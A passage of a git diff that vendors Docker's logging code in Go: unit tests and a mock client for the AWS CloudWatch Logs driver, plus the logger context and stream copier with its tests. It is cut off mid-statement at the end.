nextSequenceToken = "nextSequenceToken" + logline = "this is a log line" +) + +func TestNewAWSLogsClientUserAgentHandler(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{ + regionKey: "us-east-1", + }, + } + + client, err := newAWSLogsClient(ctx) + if err != nil { + t.Fatal(err) + } + realClient, ok := client.(*cloudwatchlogs.CloudWatchLogs) + if !ok { + t.Fatal("Could not cast client to cloudwatchlogs.CloudWatchLogs") + } + buildHandlerList := realClient.Handlers.Build + request := &request.Request{ + HTTPRequest: &http.Request{ + Header: http.Header{}, + }, + } + buildHandlerList.Run(request) + expectedUserAgentString := fmt.Sprintf("Docker %s (%s) %s/%s (%s; %s; %s)", + dockerversion.Version, runtime.GOOS, aws.SDKName, aws.SDKVersion, runtime.Version(), runtime.GOOS, runtime.GOARCH) + userAgent := request.HTTPRequest.Header.Get("User-Agent") + if userAgent != expectedUserAgentString { + t.Errorf("Wrong User-Agent string, expected \"%s\" but was \"%s\"", + expectedUserAgentString, userAgent) + } +} + +func TestNewAWSLogsClientRegionDetect(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{}, + } + + mockMetadata := newMockMetadataClient() + newRegionFinder = func() regionFinder { + return mockMetadata + } + mockMetadata.regionResult <- ®ionResult{ + successResult: "us-east-1", + } + + _, err := newAWSLogsClient(ctx) + if err != nil { + t.Fatal(err) + } +} + +func TestCreateSuccess(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + } + mockClient.createLogStreamResult <- &createLogStreamResult{} + + err := stream.create() + + if err != nil { + t.Errorf("Received unexpected err: %v\n", err) + } + argument := <-mockClient.createLogStreamArgument + if argument.LogGroupName == nil { + t.Fatal("Expected non-nil LogGroupName") + } + if *argument.LogGroupName != groupName { + t.Errorf("Expected LogGroupName to be %s", groupName) + } + if argument.LogStreamName == nil { + t.Fatal("Expected non-nil LogGroupName") + } + if *argument.LogStreamName != streamName { + t.Errorf("Expected LogStreamName to be %s", streamName) + } +} + +func TestCreateError(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + } + mockClient.createLogStreamResult <- &createLogStreamResult{ + errorResult: errors.New("Error!"), + } + + err := stream.create() + + if err == nil { + t.Fatal("Expected non-nil err") + } +} + +func TestCreateAlreadyExists(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + } + mockClient.createLogStreamResult <- &createLogStreamResult{ + errorResult: awserr.New(resourceAlreadyExistsCode, "", nil), + } + + err := stream.create() + + if err != nil { + t.Fatal("Expected nil err") + } +} + +func TestPublishBatchSuccess(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + events := []wrappedEvent{ + { + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(logline), + }, + }, + } + + stream.publishBatch(events) + if stream.sequenceToken == nil { + t.Fatal("Expected non-nil sequenceToken") + } + if *stream.sequenceToken != nextSequenceToken { + t.Errorf("Expected sequenceToken to be %s, but was %s", nextSequenceToken, *stream.sequenceToken) + } + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if argument.SequenceToken == nil { + t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken") + } + if *argument.SequenceToken != sequenceToken { + t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken) + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if argument.LogEvents[0] != events[0].inputLogEvent { + t.Error("Expected event to equal input") + } +} + +func TestPublishBatchError(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + errorResult: errors.New("Error!"), + } + + events := []wrappedEvent{ + { + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(logline), + }, + }, + } + + stream.publishBatch(events) + if stream.sequenceToken == nil { + t.Fatal("Expected non-nil sequenceToken") + } + if *stream.sequenceToken != sequenceToken { + t.Errorf("Expected sequenceToken to be %s, but was %s", sequenceToken, *stream.sequenceToken) + } +} + +func TestPublishBatchInvalidSeqSuccess(t *testing.T) { + mockClient := newMockClientBuffered(2) + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + errorResult: awserr.New(invalidSequenceTokenCode, "use token token", nil), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + + events := []wrappedEvent{ + { + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(logline), + }, + }, + } + + stream.publishBatch(events) + if stream.sequenceToken == nil { + t.Fatal("Expected non-nil sequenceToken") + } + if *stream.sequenceToken != nextSequenceToken { + t.Errorf("Expected sequenceToken to be %s, but was %s", nextSequenceToken, *stream.sequenceToken) + } + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if argument.SequenceToken == nil { + t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken") + } + if *argument.SequenceToken != sequenceToken { + t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken) + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if argument.LogEvents[0] != events[0].inputLogEvent { + t.Error("Expected event to equal input") + } + + argument = <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if argument.SequenceToken == nil { + t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken") + } + if *argument.SequenceToken != "token" { + t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", "token", *argument.SequenceToken) + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if argument.LogEvents[0] != events[0].inputLogEvent { + t.Error("Expected event to equal input") + } +} + +func TestPublishBatchAlreadyAccepted(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + errorResult: awserr.New(dataAlreadyAcceptedCode, "use token token", nil), + } + + events := []wrappedEvent{ + { + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(logline), + }, + }, + } + + stream.publishBatch(events) + if stream.sequenceToken == nil { + t.Fatal("Expected non-nil sequenceToken") + } + if *stream.sequenceToken != "token" { + t.Errorf("Expected sequenceToken to be %s, but was %s", "token", *stream.sequenceToken) + } + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if argument.SequenceToken == nil { + t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken") + } + if *argument.SequenceToken != sequenceToken { + t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken) + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if argument.LogEvents[0] != events[0].inputLogEvent { + t.Error("Expected event to equal input") + } +} + +func TestCollectBatchSimple(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Time{}, + }) + + ticks <- time.Time{} + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != logline { + t.Errorf("Expected message to be %s but was %s", logline, *argument.LogEvents[0].Message) + } +} + +func TestCollectBatchTicker(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + stream.Log(&logger.Message{ + Line: []byte(logline + " 1"), + Timestamp: time.Time{}, + }) + stream.Log(&logger.Message{ + Line: []byte(logline + " 2"), + Timestamp: time.Time{}, + }) + + ticks <- time.Time{} + + // Verify first batch + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 2 { + t.Errorf("Expected LogEvents to contain 2 elements, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != logline+" 1" { + t.Errorf("Expected message to be %s but was %s", logline+" 1", *argument.LogEvents[0].Message) + } + if *argument.LogEvents[1].Message != logline+" 2" { + t.Errorf("Expected message to be %s but was %s", logline+" 2", *argument.LogEvents[0].Message) + } + + stream.Log(&logger.Message{ + Line: []byte(logline + " 3"), + Timestamp: time.Time{}, + }) + + ticks <- time.Time{} + argument = <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 elements, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != logline+" 3" { + t.Errorf("Expected message to be %s but was %s", logline+" 3", *argument.LogEvents[0].Message) + } + + stream.Close() + +} + +func TestCollectBatchClose(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + var ticks = make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Time{}, + }) + + // no ticks + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != logline { + t.Errorf("Expected message to be %s but was %s", logline, *argument.LogEvents[0].Message) + } +} + +func TestCollectBatchLineSplit(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + var ticks = make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + longline := strings.Repeat("A", maximumBytesPerEvent) + stream.Log(&logger.Message{ + Line: []byte(longline + "B"), + Timestamp: time.Time{}, + }) + + // no ticks + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 2 { + t.Errorf("Expected LogEvents to contain 2 elements, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != longline { + t.Errorf("Expected message to be %s but was %s", longline, *argument.LogEvents[0].Message) + } + if *argument.LogEvents[1].Message != "B" { + t.Errorf("Expected message to be %s but was %s", "B", *argument.LogEvents[1].Message) + } +} + +func TestCollectBatchMaxEvents(t *testing.T) { + mockClient := newMockClientBuffered(1) + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + var ticks = make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + line := "A" + for i := 0; i <= maximumLogEventsPerPut; i++ { + stream.Log(&logger.Message{ + Line: []byte(line), + Timestamp: time.Time{}, + }) + } + + // no ticks + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != maximumLogEventsPerPut { + t.Errorf("Expected LogEvents to contain %d elements, but contains %d", maximumLogEventsPerPut, len(argument.LogEvents)) + } + + argument = <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain %d elements, but contains %d", 1, len(argument.LogEvents)) + } +} + +func TestCollectBatchMaxTotalBytes(t *testing.T) { + mockClient := newMockClientBuffered(1) + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + var ticks = make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + longline := strings.Repeat("A", maximumBytesPerPut) + stream.Log(&logger.Message{ + Line: []byte(longline + "B"), + Timestamp: time.Time{}, + }) + + // no ticks + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + bytes := 0 + for _, event := range argument.LogEvents { + bytes += len(*event.Message) + } + if bytes > maximumBytesPerPut { + t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, bytes) + } + + argument = <-mockClient.putLogEventsArgument + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 elements, but contains %d", len(argument.LogEvents)) + } + message := *argument.LogEvents[0].Message + if message[len(message)-1:] != "B" { + t.Errorf("Expected message to be %s but was %s", "B", message[len(message)-1:]) + } +} + +func TestCollectBatchWithDuplicateTimestamps(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + times := maximumLogEventsPerPut + expectedEvents := []*cloudwatchlogs.InputLogEvent{} + timestamp := time.Now() + for i := 0; i < times; i++ { + line := fmt.Sprintf("%d", i) + if i%2 == 0 { + timestamp.Add(1 * time.Nanosecond) + } + stream.Log(&logger.Message{ + Line: []byte(line), + Timestamp: timestamp, + }) + expectedEvents = append(expectedEvents, &cloudwatchlogs.InputLogEvent{ + Message: aws.String(line), + Timestamp: aws.Int64(timestamp.UnixNano() / int64(time.Millisecond)), + }) + } + + ticks <- time.Time{} + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != times { + t.Errorf("Expected LogEvents to contain %d elements, but contains %d", times, len(argument.LogEvents)) + } + for i := 0; i < times; i++ { + if !reflect.DeepEqual(*argument.LogEvents[i], *expectedEvents[i]) { + t.Errorf("Expected event to be %v but was %v", *expectedEvents[i], *argument.LogEvents[i]) + } + } +} + +func TestCreateTagSuccess(t *testing.T) { + mockClient := newMockClient() + ctx := logger.Context{ + ContainerName: "/test-container", + ContainerID: "container-abcdefghijklmnopqrstuvwxyz01234567890", + Config: map[string]string{"tag": "{{.Name}}/{{.FullID}}"}, + } + logStreamName, e := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if e != nil { + t.Errorf("Error generating tag: %q", e) + } + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: logStreamName, + } + mockClient.createLogStreamResult <- &createLogStreamResult{} + + err := stream.create() + + if err != nil { + t.Errorf("Received unexpected err: %v\n", err) + } + argument := <-mockClient.createLogStreamArgument + + if *argument.LogStreamName != "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890" { + t.Errorf("Expected LogStreamName to be %s", "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890") + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go new file mode 100644 index 0000000000..b768a3d7ec --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go @@ -0,0 +1,77 @@ +package awslogs + +import "github.com/aws/aws-sdk-go/service/cloudwatchlogs" + +type mockcwlogsclient struct { + createLogStreamArgument chan *cloudwatchlogs.CreateLogStreamInput + createLogStreamResult chan *createLogStreamResult + putLogEventsArgument chan *cloudwatchlogs.PutLogEventsInput + putLogEventsResult chan *putLogEventsResult +} + +type createLogStreamResult struct { + successResult *cloudwatchlogs.CreateLogStreamOutput + errorResult error +} + +type putLogEventsResult struct { + successResult *cloudwatchlogs.PutLogEventsOutput + errorResult error +} + +func newMockClient() *mockcwlogsclient { + return &mockcwlogsclient{ + createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, 1), + createLogStreamResult: make(chan *createLogStreamResult, 1), + putLogEventsArgument: make(chan *cloudwatchlogs.PutLogEventsInput, 1), + putLogEventsResult: make(chan *putLogEventsResult, 1), + } +} + +func newMockClientBuffered(buflen int) *mockcwlogsclient { + return &mockcwlogsclient{ + createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, buflen), + createLogStreamResult: make(chan *createLogStreamResult, buflen), + putLogEventsArgument: make(chan *cloudwatchlogs.PutLogEventsInput, buflen), + putLogEventsResult: make(chan *putLogEventsResult, buflen), + } +} + +func (m *mockcwlogsclient) CreateLogStream(input *cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) { + m.createLogStreamArgument <- input + output := <-m.createLogStreamResult + return output.successResult, output.errorResult +} + +func (m *mockcwlogsclient) PutLogEvents(input *cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error) { + events := make([]*cloudwatchlogs.InputLogEvent, len(input.LogEvents)) + copy(events, input.LogEvents) + m.putLogEventsArgument <- &cloudwatchlogs.PutLogEventsInput{ + LogEvents: events, + SequenceToken: input.SequenceToken, + LogGroupName: input.LogGroupName, + LogStreamName: input.LogStreamName, + } + output := <-m.putLogEventsResult + return output.successResult, output.errorResult +} + +type mockmetadataclient struct { + regionResult chan *regionResult +} + +type regionResult struct { + successResult string + errorResult error +} + +func newMockMetadataClient() *mockmetadataclient { + return &mockmetadataclient{ + regionResult: make(chan *regionResult, 1), + } +} + +func (m *mockmetadataclient) Region() (string, error) { + output := <-m.regionResult + return output.successResult, output.errorResult +} diff --git a/vendor/github.com/docker/docker/daemon/logger/context.go b/vendor/github.com/docker/docker/daemon/logger/context.go new file mode 100644 index 0000000000..085ab01a18 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/context.go @@ -0,0 +1,111 @@ +package logger + +import ( + "fmt" + "os" + "strings" + "time" +) + +// Context provides enough information for a logging driver to do its function. +type Context struct { + Config map[string]string + ContainerID string + ContainerName string + ContainerEntrypoint string + ContainerArgs []string + ContainerImageID string + ContainerImageName string + ContainerCreated time.Time + ContainerEnv []string + ContainerLabels map[string]string + LogPath string + DaemonName string +} + +// ExtraAttributes returns the user-defined extra attributes (labels, +// environment variables) in key-value format. This can be used by log drivers +// that support metadata to add more context to a log. +func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]string { + extra := make(map[string]string) + labels, ok := ctx.Config["labels"] + if ok && len(labels) > 0 { + for _, l := range strings.Split(labels, ",") { + if v, ok := ctx.ContainerLabels[l]; ok { + if keyMod != nil { + l = keyMod(l) + } + extra[l] = v + } + } + } + + env, ok := ctx.Config["env"] + if ok && len(env) > 0 { + envMapping := make(map[string]string) + for _, e := range ctx.ContainerEnv { + if kv := strings.SplitN(e, "=", 2); len(kv) == 2 { + envMapping[kv[0]] = kv[1] + } + } + for _, l := range strings.Split(env, ",") { + if v, ok := envMapping[l]; ok { + if keyMod != nil { + l = keyMod(l) + } + extra[l] = v + } + } + } + + return extra +} + +// Hostname returns the hostname from the underlying OS. +func (ctx *Context) Hostname() (string, error) { + hostname, err := os.Hostname() + if err != nil { + return "", fmt.Errorf("logger: can not resolve hostname: %v", err) + } + return hostname, nil +} + +// Command returns the command that the container being logged was +// started with. The Entrypoint is prepended to the container +// arguments. +func (ctx *Context) Command() string { + terms := []string{ctx.ContainerEntrypoint} + terms = append(terms, ctx.ContainerArgs...) + command := strings.Join(terms, " ") + return command +} + +// ID Returns the Container ID shortened to 12 characters. +func (ctx *Context) ID() string { + return ctx.ContainerID[:12] +} + +// FullID is an alias of ContainerID. +func (ctx *Context) FullID() string { + return ctx.ContainerID +} + +// Name returns the ContainerName without a preceding '/'. +func (ctx *Context) Name() string { + return ctx.ContainerName[1:] +} + +// ImageID returns the ContainerImageID shortened to 12 characters. +func (ctx *Context) ImageID() string { + return ctx.ContainerImageID[:12] +} + +// ImageFullID is an alias of ContainerImageID. +func (ctx *Context) ImageFullID() string { + return ctx.ContainerImageID +} + +// ImageName is an alias of ContainerImageName +func (ctx *Context) ImageName() string { + return ctx.ContainerImageName +} diff --git a/vendor/github.com/docker/docker/daemon/logger/copier.go b/vendor/github.com/docker/docker/daemon/logger/copier.go new file mode 100644 index 0000000000..10ab46e162 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/copier.go @@ -0,0 +1,131 @@ +package logger + +import ( + "bytes" + "io" + "sync" + "time" + + "github.com/Sirupsen/logrus" +) + +const ( + bufSize = 16 * 1024 + readSize = 2 * 1024 +) + +// Copier can copy logs from specified sources to Logger and attach Timestamp. +// Writes are concurrent, so you need implement some sync in your logger. +type Copier struct { + // srcs is map of name -> reader pairs, for example "stdout", "stderr" + srcs map[string]io.Reader + dst Logger + copyJobs sync.WaitGroup + closeOnce sync.Once + closed chan struct{} +} + +// NewCopier creates a new Copier +func NewCopier(srcs map[string]io.Reader, dst Logger) *Copier { + return &Copier{ + srcs: srcs, + dst: dst, + closed: make(chan struct{}), + } +} + +// Run starts logs copying +func (c *Copier) Run() { + for src, w := range c.srcs { + c.copyJobs.Add(1) + go c.copySrc(src, w) + } +} + +func (c *Copier) copySrc(name string, src io.Reader) { + defer c.copyJobs.Done() + buf := make([]byte, bufSize) + n := 0 + eof := false + msg := &Message{Source: name} + + for { + select { + case <-c.closed: + return + default: + // Work out how much more data we are okay with reading this time. + upto := n + readSize + if upto > cap(buf) { + upto = cap(buf) + } + // Try to read that data. + if upto > n { + read, err := src.Read(buf[n:upto]) + if err != nil { + if err != io.EOF { + logrus.Errorf("Error scanning log stream: %s", err) + return + } + eof = true + } + n += read + } + // If we have no data to log, and there's no more coming, we're done. + if n == 0 && eof { + return + } + // Break up the data that we've buffered up into lines, and log each in turn. + p := 0 + for q := bytes.Index(buf[p:n], []byte{'\n'}); q >= 0; q = bytes.Index(buf[p:n], []byte{'\n'}) { + msg.Line = buf[p : p+q] + msg.Timestamp = time.Now().UTC() + msg.Partial = false + select { + case <-c.closed: + return + default: + if logErr := c.dst.Log(msg); logErr != nil { + logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr) + } + } + p += q + 1 + } + // If there's no more coming, or the buffer is full but + // has no newlines, log whatever we haven't logged yet, + // noting that it's a partial log line. + if eof || (p == 0 && n == len(buf)) { + if p < n { + msg.Line = buf[p:n] + msg.Timestamp = time.Now().UTC() + msg.Partial = true + if logErr := c.dst.Log(msg); logErr != nil { + logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr) + } + p = 0 + n = 0 + } + if eof { + return + } + } + // Move any unlogged data to the front of the buffer in preparation for another read. + if p > 0 { + copy(buf[0:], buf[p:n]) + n -= p + } + } + } +} + +// Wait waits until all copying is done +func (c *Copier) Wait() { + c.copyJobs.Wait() +} + +// Close closes the copier +func (c *Copier) Close() { + c.closeOnce.Do(func() { + close(c.closed) + }) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/copier_test.go b/vendor/github.com/docker/docker/daemon/logger/copier_test.go new file mode 100644 index 0000000000..cfd816a6eb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/copier_test.go @@ -0,0 +1,296 @@ +package logger + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "os" + "strings" + "sync" + "testing" + "time" +) + +type TestLoggerJSON struct { + *json.Encoder + mu sync.Mutex + delay time.Duration +} + +func (l *TestLoggerJSON) Log(m *Message) error { + if l.delay > 0 { + time.Sleep(l.delay) + } + l.mu.Lock() + defer l.mu.Unlock() + return l.Encode(m) +} + +func (l *TestLoggerJSON) Close() error { return nil } + +func (l *TestLoggerJSON) Name() string { return "json" } + +func TestCopier(t *testing.T) { + stdoutLine := "Line that thinks that it is log line from docker stdout" + stderrLine := "Line that thinks that it is log line from docker stderr" + stdoutTrailingLine := "stdout trailing line" + stderrTrailingLine := "stderr trailing line" + + var stdout bytes.Buffer + var stderr bytes.Buffer + for i := 0; i < 30; i++ { + if _, err := stdout.WriteString(stdoutLine + "\n"); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrLine + "\n"); err != nil { + t.Fatal(err) + } + } + + // Test remaining lines without line-endings + if _, err := stdout.WriteString(stdoutTrailingLine); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrTrailingLine); err != nil { + t.Fatal(err) + } + + var jsonBuf bytes.Buffer + + jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)} + + c := NewCopier( + map[string]io.Reader{ + "stdout": &stdout, + "stderr": &stderr, + }, + jsonLog) + c.Run() + wait := make(chan struct{}) + go func() { + c.Wait() + close(wait) + }() + select { + case <-time.After(1 * time.Second): + t.Fatal("Copier failed to do its work in 1 second") + case <-wait: + } + dec := json.NewDecoder(&jsonBuf) + for { + var msg Message + if err := dec.Decode(&msg); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if msg.Source != "stdout" && msg.Source != "stderr" { + t.Fatalf("Wrong Source: %q, should be %q or %q", msg.Source, "stdout", "stderr") + } + if msg.Source == "stdout" { + if string(msg.Line) != stdoutLine && string(msg.Line) != stdoutTrailingLine { + t.Fatalf("Wrong Line: %q, expected %q or %q", msg.Line, stdoutLine, stdoutTrailingLine) + } + } + if msg.Source == "stderr" { + if string(msg.Line) != stderrLine && string(msg.Line) != stderrTrailingLine { + t.Fatalf("Wrong Line: %q, expected %q or %q", msg.Line, stderrLine, stderrTrailingLine) + } + } + } +} + +// TestCopierLongLines tests long lines without line breaks +func TestCopierLongLines(t *testing.T) { + // Long lines (should be split at "bufSize") + const bufSize = 16 * 1024 + stdoutLongLine := strings.Repeat("a", bufSize) + stderrLongLine := strings.Repeat("b", bufSize) + stdoutTrailingLine := "stdout trailing line" + stderrTrailingLine := "stderr trailing line" + + var stdout bytes.Buffer + var stderr bytes.Buffer + + for i := 0; i < 3; i++ { + if _, err := stdout.WriteString(stdoutLongLine); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrLongLine); err != nil { + t.Fatal(err) + } + } + + if _, err := stdout.WriteString(stdoutTrailingLine); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrTrailingLine); err != nil { + t.Fatal(err) + } + + var jsonBuf bytes.Buffer + + jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)} + + c := NewCopier( + map[string]io.Reader{ + "stdout": &stdout, + "stderr": &stderr, + }, + jsonLog) + c.Run() + wait := make(chan struct{}) + go func() { + c.Wait() + close(wait) + }() + select { + case <-time.After(1 * time.Second): + t.Fatal("Copier failed to do its work in 1 second") + case <-wait: + } + dec := json.NewDecoder(&jsonBuf) + for { + var msg Message + if err := dec.Decode(&msg); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if msg.Source != "stdout" && msg.Source != "stderr" { + t.Fatalf("Wrong Source: %q, should be %q or %q", msg.Source, "stdout", 